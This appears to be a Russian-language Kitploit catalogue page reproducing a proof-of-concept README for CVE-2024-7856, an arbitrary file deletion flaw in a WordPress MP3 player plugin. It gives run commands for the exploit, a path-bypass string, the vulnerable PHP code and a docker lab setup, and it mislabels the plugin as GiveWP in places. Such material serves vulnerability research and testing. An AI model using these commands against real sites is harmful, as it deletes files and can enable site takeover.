Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/l8bl/cve-2024-7856
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubl8bl/cve-2024-7856

CVE-2024-7856

Proof-of-Concept для CVE-2024-7856

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-7856

★ CVE-2024-7856 PoC произвольного удаления файлов ★

Описание

CVE-2024-7856 : MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar <= 5.7.0.1 – Отсутствие проверки авторизации у аутентифицированных пользователей (Subscriber+): произвольное удаление файлов

Исследователь: Arkadiusz Hydzik

описание: Плагин MP3 Audio Player Music Player, Podcast Player & Radio by Sonaar для WordPress уязвим к несанкционированному произвольному удалению файлов из-за отсутствия проверки прав доступа (capability check) в функции removeTempFiles() и недостаточной проверки пути в параметре 'file' во всех версиях вплоть до 5.7.0.1 включительно. Это позволяет аутентифицированным злоумышленникам с уровнем доступа подписчика (subscriber) и выше удалять произвольные файлы, что может сделать возможным удалённое выполнение кода при удалении wp-config.php.

Как использовать

Клонирование репозитория

root@kitploit:~
git clone https://github.com/l8BL/CVE-2024-7856.git
cd CVE-2024-7856

Установка пакетов

root@kitploit:~
pip install -r requirements.txt

Команда

root@kitploit:~
# Arbitrary file deletion
python3 CVE-2024-7856.py -u <URL_TO_EXPLOIT> -f <FILE_TO_DELETE>
python3 CVE-2024-7856.py -u <URL_TO_EXPLOIT> -f <FILE_TO_DELETE> -i <USER_ID_TO_LOGIN> -p <USER_PW_TO_LOGIN>

Пример

root@kitploit:~
python3 CVE-2024-7856.py -u http://example.com/ -f /tmp/test
python3 CVE-2024-7856.py -u http://example.com/ -f /tmp/test -i EQSTtester -p q1w2e3r4t5y!

Вывод

CVE-2024-7856.py alt text

Результат

alt text

Уязвимая среда

1. docker-compose.yml

root@kitploit:~
services:
  db:
    image: mysql:8.0.27
    command: '--default-authentication-plugin=mysql_native_password'
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=somewordpress
      - MYSQL_DATABASE=wordpress
      - MYSQL_USER=wordpress
      - MYSQL_PASSWORD=wordpress
    expose:
      - 3306
      - 33060
  wordpress:
    image: wordpress:6.3.2
    ports:
      - 80:80
    restart: always
    environment:
      - WORDPRESS_DB_HOST=db
      - WORDPRESS_DB_USER=wordpress
      - WORDPRESS_DB_PASSWORD=wordpress
      - WORDPRESS_DB_NAME=wordpress
volumes:
  db_data:

2. Затем скачайте уязвимый плагин GiveWP:

https://downloads.wordpress.org/plugin/mp3-music-player-by-sonaar.5.7.zip

3. Распакуйте ZIP-файл плагина GiveWP и скопируйте всю папку в каталог «/var/www/html/wp-content/plugins».

root@kitploit:~
docker cp mp3-music-player-by-sonaar docker-wordpress-1:/var/www/html/wp-content/plugins

Анализ

Уязвимое место 1 (includes/class-sonaar-music.php)

root@kitploit:~
public function removeTempFiles(){
		// will unlink the temporary peak file and generate another one automatically.

		check_ajax_referer('sonaar_music_admin_ajax_nonce', 'nonce');
	
		$is_temp = filter_input(INPUT_POST, 'is_temp', FILTER_VALIDATE_BOOLEAN);
		$file = filter_input(INPUT_POST, 'file', FILTER_SANITIZE_STRING);
	
		if ($is_temp && $file) {
			$upload_dir = wp_get_upload_dir();
			
			$peaks_dir = $this->get_peak_dir();
	
			$file_path_temp = str_replace($upload_dir['baseurl'] . $this->get_peak_dir(true), $peaks_dir, $file);
	
			if (strpos($file_path_temp, $peaks_dir) === 0 && file_exists($file_path_temp)) {
				wp_delete_file($file_path_temp);
			}
		}
		
		
	}

Уязвимое место 2 (admin/class-sonaar-music-admin.php)

root@kitploit:~
if (strpos($hook, SR_PLAYLIST_CPT . '_page_srmp3_settings_') === 0) {
            wp_enqueue_script( 'cmb2_image_select_metafield-js', plugin_dir_url( __FILE__ ) . 'library/cmb2-image-select-field-type/image_select_metafield.js' , '', '1.0.0', true );  // Used for plugin settings page only. it does not work on group repeater fields
            wp_enqueue_script( 'sonaar-music', plugin_dir_url( __DIR__ ) . 'public/js/sonaar-music-public.js', array( 'jquery' ), $this->version, true ); // used for peak generation
            wp_localize_script('sonaar-admin', 'sonaar_music', array(
                'plugin_version_free'=> SRMP3_VERSION,
                'plugin_version_pro'=> ( defined( 'SRMP3PRO_VERSION' ) ? SRMP3PRO_VERSION : 'Not Installed' ),
                'ajax' => array(
                    'ajax_url' => admin_url( 'admin-ajax.php' ),
                    'ajax_nonce' => wp_create_nonce( 'sonaar_music_admin_ajax_nonce' ),
                    'ajax_nonce_peaks' => wp_create_nonce( 'sonaar_music_ajax_peaks_nonce' ),
                ),
            ));
            

        }

Техника обхода

Подмена пути : /wp-admin/index.php/%0a/wp-admin/sr_playlist_page_srmp3_settings_

Сценарий атаки

Произвольное удаление файлов

Имея авторизованного пользователя, вы можете эксплуатировать произвольное удаление файлов.

Отказ от ответственности

Этот репозиторий не предназначен для использования в качестве эксплойта произвольного удаления файлов для CVE-2024-7856. Цель этого проекта — помочь людям изучить эту уязвимость и, возможно, протестировать собственные приложения.

Ссылка

https://www.wordfence.com/blog/2024/09/critical-arbitrary-file-deletion-vulnerability-in-mp3-audio-player-wordpress-plugin-affects-over-20000-sites/

Скачать инструмент